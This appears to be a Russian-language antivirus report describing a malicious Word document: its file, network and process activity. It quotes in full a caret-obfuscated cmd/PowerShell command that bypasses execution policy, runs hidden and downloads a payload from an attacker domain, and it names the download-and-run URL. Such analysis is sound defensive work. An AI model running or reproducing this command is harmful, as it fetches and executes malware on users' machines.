Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "POWE^Rsh^EL^l.Ex^E -EXE^C^ut^io^NPoL^icy by^pasS -^N^O^prO^filE -w^InDOWs^Ty^L^E hI^dDen (Ne^W-O^bJECT SY^sT^Em^.Net.wE^BcLIenT)^.doWNloA^dFi^l^E('http://asecwitlecn.bid/read.php...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\word\<Имя файла>.doc
Удаляет следующие файлы
- %TEMP%\word\<Имя файла>.doc
Сетевая активность
Подключается к
- 'as###itlecn.bid':80
TCP
Запросы HTTP GET
- http://as###itlecn.bid/read.php?f=#####
UDP
- DNS ASK as###itlecn.bid
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "POWE^Rsh^EL^l.Ex^E -EXE^C^ut^io^NPoL^icy by^pasS -^N^O^prO^filE -w^InDOWs^Ty^L^E hI^dDen (Ne^W-O^bJECT SY^sT^Em^.Net.wE^BcLIenT)^.doWNloA^dFi^l^E('http://asecwitlecn.bid/read.php...' (со скрытым окном)
